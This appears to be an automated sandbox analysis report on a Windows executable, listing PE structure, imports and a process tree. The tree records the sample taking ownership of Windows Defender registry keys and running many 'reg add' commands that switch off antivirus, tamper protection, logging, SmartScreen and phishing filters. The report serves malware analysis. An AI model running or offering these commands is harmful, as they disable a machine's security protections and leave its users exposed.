               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
               .text | 0x1000 | 0x6254 | 0x6400 | False | 0.6676171875 | data | 6.4338643172916266 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
               .rdata | 0x8000 | 0x1354 | 0x1400 | False | 0.4599609375 | data | 5.236269898436511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
               .data | 0xa000 | 0x25518 | 0x600 | False | 0.4557291666666667 | data | 4.044625496015545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
               .ndata | 0x30000 | 0x1b000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
               .rsrc | 0x4b000 | 0x42a8 | 0x4400 | False | 0.3018152573529412 | data | 4.944452051049104 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
               RT_ICON | 0x4b1f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.2642116182572614
               RT_ICON | 0x4d798 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.324812382739212
               RT_ICON | 0x4e840 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.5035460992907801
               RT_DIALOG | 0x4eca8 | 0x100 | data | English | United States | 0.5234375
               RT_DIALOG | 0x4eda8 | 0x11c | data | English | United States | 0.6056338028169014
               RT_DIALOG | 0x4eec8 | 0x60 | data | English | United States | 0.7291666666666666
               RT_GROUP_ICON | 0x4ef28 | 0x30 | data | English | United States | 0.8333333333333334
               RT_MANIFEST | 0x4ef58 | 0x34b | XML 1.0 document, ASCII text, with very long lines (843), with no line terminators | English | United States | 0.5527876631079478
               DLL | Import
               KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
               USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
               GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
               SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
               ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
               COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
               ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
               Language of compilation system | Country where language is spoken
               English | United States
              No network behavior found

              Target ID:0
              Start time:19:41:04
              Start date:02/08/2023
              Path:C:\Users\user\Desktop\Ptmhbplhxb.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\Ptmhbplhxb.exe
              Imagebase:0x400000
              File size:3'596'632 bytes
              MD5 hash:92189D2D76DB2A5549F25E35A52A2451
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:1
              Start time:19:41:04
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat
              Imagebase:0xa60000
              File size:232'960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:19:41:04
              Start date:02/08/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625'664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:19:41:04
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 0%, ReversingLabs
               • Detection: 0%, Virustotal
              Reputation:low

              Target ID:4
              Start time:19:41:05
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:5
              Start time:19:41:05
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:6
              Start time:19:41:06
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
              Imagebase:0x7ff6edaf0000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:7
              Start time:19:41:06
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:8
              Start time:19:41:06
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:9
              Start time:19:41:07
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:10
              Start time:19:41:07
              Start date:02/08/2023
              Path:C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
              Wow64 process (32bit):true
              Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
              Imagebase:0xf50000
              File size:526'200 bytes
              MD5 hash:93B828ED97CB2C701364DF520DDD5331
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:11
              Start time:19:41:08
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:12
              Start time:19:41:08
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:13
              Start time:19:41:08
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:14
              Start time:19:41:08
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:15
              Start time:19:41:09
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:16
              Start time:19:41:09
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:17
              Start time:19:41:09
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:18
              Start time:19:41:09
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:19
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:20
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:21
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:22
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:23
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:24
              Start time:19:41:10
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:25
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:26
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:27
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:28
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:29
              Start time:19:41:11
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:30
              Start time:19:41:12
              Start date:02/08/2023
              Path:C:\Windows\SysWOW64\reg.exe
              Wow64 process (32bit):true
              Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
              Imagebase:0x12a0000
              File size:59'392 bytes
              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

Target ID: 31
Start time: 19:41:12
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 32
Start time: 19:41:12
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 33
Start time: 19:41:12
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 34
Start time: 19:41:13
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 35
Start time: 19:41:13
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 36
Start time: 19:41:13
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 37
Start time: 19:41:13
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 38
Start time: 19:41:14
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 39
Start time: 19:41:14
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 40
Start time: 19:41:14
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 41
Start time: 19:41:14
Start date: 02/08/2023
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Imagebase: 0x12a0000
File size: 59'392 bytes
MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language


Execution Graph

Execution Coverage: 16%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 21.3%
Total number of Nodes: 1262
Total number of Limit Nodes: 25
SendMessageA 3877->3881 3880 405072 CallWindowProcA 3878->3880 3879->3878 3882 405039 3879->3882 3883 405020 3880->3883 3881->3883 3887 404957 SendMessageA 3882->3887 3885->3880 3892 4049d7 3885->3892 3888 4049b6 SendMessageA 3887->3888 3889 40497a GetMessagePos ScreenToClient SendMessageA 3887->3889 3891 4049ae 3888->3891 3890 4049b3 3889->3890 3889->3891 3890->3888 3891->3885 3901 405f65 lstrcpynA 3892->3901 3894 4049ea 3902 405ec3 wsprintfA 3894->3902 3896 4049f4 3897 40140b 2 API calls 3896->3897 3898 4049fd 3897->3898 3903 405f65 lstrcpynA 3898->3903 3900 404a04 3900->3878 3901->3894 3902->3896 3903->3900 3904 401900 3905 402ac1 17 API calls 3904->3905 3906 401907 3905->3906 3907 405681 MessageBoxIndirectA 3906->3907 3908 401910 3907->3908 3909 401502 3910 40150a 3909->3910 3912 40151d 3909->3912 3911 402a9f 17 API calls 3910->3911 3911->3912 3913 402682 3914 402689 3913->3914 3916 4028fe 3913->3916 3915 402a9f 17 API calls 3914->3915 3917 402690 3915->3917 3918 40269f SetFilePointer 3917->3918 3918->3916 3919 4026af 3918->3919 3921 405ec3 wsprintfA 3919->3921 3921->3916 3922 401c04 3923 402a9f 17 API calls 3922->3923 3924 401c0b 3923->3924 3925 402a9f 17 API calls 3924->3925 3926 401c18 3925->3926 3927 401c2d 3926->3927 3928 402ac1 17 API calls 3926->3928 3929 402ac1 17 API calls 3927->3929 3933 401c3d 3927->3933 3928->3927 3929->3933 3930 401c94 3932 402ac1 17 API calls 3930->3932 3931 401c48 3934 402a9f 17 API calls 3931->3934 3936 401c99 3932->3936 3933->3930 3933->3931 3935 401c4d 3934->3935 3937 402a9f 17 API calls 3935->3937 3938 402ac1 17 API calls 3936->3938 3939 401c59 3937->3939 3940 401ca2 FindWindowExA 3938->3940 3941 401c84 SendMessageA 3939->3941 3942 401c66 SendMessageTimeoutA 3939->3942 3943 401cc0 3940->3943 3941->3943 3942->3943 3320 401389 3322 401390 3320->3322 3321 4013fe 3322->3321 3323 4013cb MulDiv SendMessageA 3322->3323 3323->3322 3944 404a09 GetDlgItem GetDlgItem 3945 404a5b 7 API calls 3944->3945 3959 404c73 3944->3959 3946 404af1 
SendMessageA 3945->3946 3947 404afe DeleteObject 3945->3947 3946->3947 3948 404b07 3947->3948 3950 404b3e 3948->3950 3953 405f87 17 API calls 3948->3953 3949 404d57 3952 404e03 3949->3952 3955 404c66 3949->3955 3962 404db0 SendMessageA 3949->3962 3951 404026 18 API calls 3950->3951 3954 404b52 3951->3954 3956 404e15 3952->3956 3957 404e0d SendMessageA 3952->3957 3958 404b20 SendMessageA SendMessageA 3953->3958 3961 404026 18 API calls 3954->3961 3963 40408d 8 API calls 3955->3963 3965 404e27 ImageList_Destroy 3956->3965 3966 404e2e 3956->3966 3973 404e3e 3956->3973 3957->3956 3958->3948 3959->3949 3960 404957 5 API calls 3959->3960 3976 404ce4 3959->3976 3960->3976 3977 404b60 3961->3977 3962->3955 3968 404dc5 SendMessageA 3962->3968 3969 404ff9 3963->3969 3964 404d49 SendMessageA 3964->3949 3965->3966 3970 404e37 GlobalFree 3966->3970 3966->3973 3967 404fad 3967->3955 3974 404fbf ShowWindow GetDlgItem ShowWindow 3967->3974 3972 404dd8 3968->3972 3970->3973 3971 404c34 GetWindowLongA SetWindowLongA 3975 404c4d 3971->3975 3983 404de9 SendMessageA 3972->3983 3973->3967 3988 4049d7 4 